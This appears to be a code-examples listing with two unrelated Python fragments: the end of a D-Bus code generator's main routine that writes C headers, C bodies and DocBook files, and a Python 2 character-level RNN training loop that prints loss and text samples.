        print_error('Using --generate-c-code or --generate-docbook and '
                    '--output at the same time is not allowed')

    if args.generate_c_code:
        outdir = args.output_directory
        header_name = args.generate_c_code + '.h'
        h_file = os.path.join(outdir, header_name)
        args.header = True
        c_file = os.path.join(outdir, args.generate_c_code + '.c')
        args.body = True
    else:
        if args.output is None:
            print_error('Using --header or --body requires --output')

        if args.header:
            h_file = args.output
            header_name = os.path.basename(h_file)
        elif args.body:
            c_file = args.output
            header_name = os.path.splitext(c_file)[0] + '.h'

    all_ifaces = []
    for fname in args.files + args.xml_files:
        with open(fname, 'rb') as f:
            xml_data = f.read()
        parsed_ifaces = parser.parse_dbus_xml(xml_data)
        all_ifaces.extend(parsed_ifaces)

    if args.annotate != None:
        apply_annotations(all_ifaces, args.annotate)

    for i in all_ifaces:
        i.post_process(args.interface_prefix, args.c_namespace)

    docbook = args.generate_docbook
    docbook_gen = codegen_docbook.DocbookCodeGenerator(all_ifaces);
    if docbook:
        ret = docbook_gen.generate(docbook, outdir)

    if args.header:
        with open(h_file, 'w') as outfile:
            gen = codegen.HeaderCodeGenerator(all_ifaces,
                                              args.c_namespace,
                                              args.c_generate_object_manager,
                                              args.c_generate_autocleanup,
                                              header_name,
                                              args.pragma_once,
                                              outfile)
            gen.generate()

    if args.body:
        with open(c_file, 'w') as outfile:
            gen = codegen.CodeGenerator(all_ifaces,
                                        args.c_namespace,
                                        args.c_generate_object_manager,
                                        header_name,
                                        docbook_gen,
                                        outfile)
            gen.generate()

    sys.exit(0)
Пример #40
0
        # Create training set from file
        inputs = data[p:p+seq_length]
        targets = data[p+1:p+seq_length+1]

        # Update RNN with data
        loss = RNN.update_rnn(inputs, targets, learning_rate)
        smooth_loss = smooth_loss * 0.999 + loss * 0.001

        # Increment data pointer with wrap-around
        if p+2*seq_length+1 < len(data):
            p += seq_length
        else:
            p = 0
            RNN.reset_state()
            print_warning("[I] Finished pass through file.")
            
        # Show progress
        if n % 250 == 0:
            print "---------------------------------------------"
            st = datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')
            print "[%s] Iteration: \t\t%d" % (st, n)
            print "\t\t   Loss: \t\t\t%7.4f" % smooth_loss
            print "\t\t   Characters Fed:  %d" % p
            print "\t\t   Sample: \n\n"
            print RNN.sample_rnn(data[p], 200)
            print "---------------------------------------------\n\n"

except KeyboardInterrupt:
    print "Halting training"